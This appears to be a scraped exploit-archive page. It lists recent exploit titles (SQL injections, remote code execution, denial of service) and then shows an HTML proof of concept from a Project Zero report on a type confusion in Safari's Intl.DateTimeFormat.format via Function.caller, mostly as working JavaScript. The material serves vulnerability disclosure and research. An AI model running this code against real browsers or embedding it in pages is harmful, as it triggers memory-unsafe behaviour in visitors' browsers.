1f8c35c0c0
25 new exploits Samba < 3.6.2 (x86) - Denial of Serviec (PoC) Samba < 3.6.2 (x86) - Denial of Service (PoC) Microsoft Visual Studio 2015 update 3 - Denial of Service Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow Apple Safari - 'DateTimeFormat.format' Type Confusion Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode Apple Safari - Out-of-Bounds Read when Calling Bound Function QNAP QTS < 4.2.4 - Domain Privilege Escalation Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory Github Enterprise - Default Session Secret And Deserialization (Metasploit) B2B Alibaba Clone Script - SQL Injection B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection Just Another Video Script 1.4.3 - SQL Injection Adult Tube Video Script - SQL Injection Alibaba Clone Script - SQL Injection B2B Marketplace Script 2.0 - SQL Injection Php Real Estate Property Script - SQL Injection Courier Tracking Software 6.0 - SQL Injection Parcel Delivery Booking Script 1.0 - SQL Injection Delux Same Day Delivery Script 1.0 - SQL Injection Hotel Booking Script 1.0 - SQL Injection Tour Package Booking 1.0 - SQL Injection Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection CouponPHP CMS 3.1 - 'code' Parameter SQL Injection EyesOfNetwork (EON) 5.0 - Remote Code Execution EyesOfNetwork (EON) 5.0 - SQL Injection Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit) inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation
56 lines
1.1 KiB
HTML
Executable file
56 lines
1.1 KiB
HTML
Executable file
<!--
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1036
|
|
|
|
There is a type confusion vulnerability when calling DateTimeFormat.format. This function is provided as a bound function by a getter in the DateTimeFormat class. Binding the function ensures that the this object is of the right type. However, when the bound function is called, it calls into user script when converting the date parameter, which can call Function.caller, obtaining the unbound function. This type unsafe function can then be called on any type.
|
|
|
|
A minimal PoC is as follows, and a full PoC is attached.
|
|
|
|
|
|
var i = new Intl.DateTimeFormat();
|
|
var q;
|
|
|
|
function f(){
|
|
q = f.caller;
|
|
return 10;
|
|
}
|
|
|
|
|
|
i.format({valueOf : f});
|
|
|
|
q.call(0x77777777);
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<script>
|
|
|
|
var date = new Date(Date.UTC(2012, 11, 20, 3, 0, 0));
|
|
|
|
var i = new Intl.DateTimeFormat();
|
|
|
|
//print(i);
|
|
|
|
var q;
|
|
|
|
function f(){
|
|
|
|
//print("in f");
|
|
//print(f.caller);
|
|
q = f.caller;
|
|
return 10;
|
|
}
|
|
|
|
try{
|
|
i.format({valueOf : f});
|
|
}catch(e){
|
|
|
|
//print("problem");
|
|
|
|
}
|
|
|
|
//print(q);
|
|
q.call(0x77777777);
|
|
|
|
</script>
|
|
</body>
|
|
</html>
|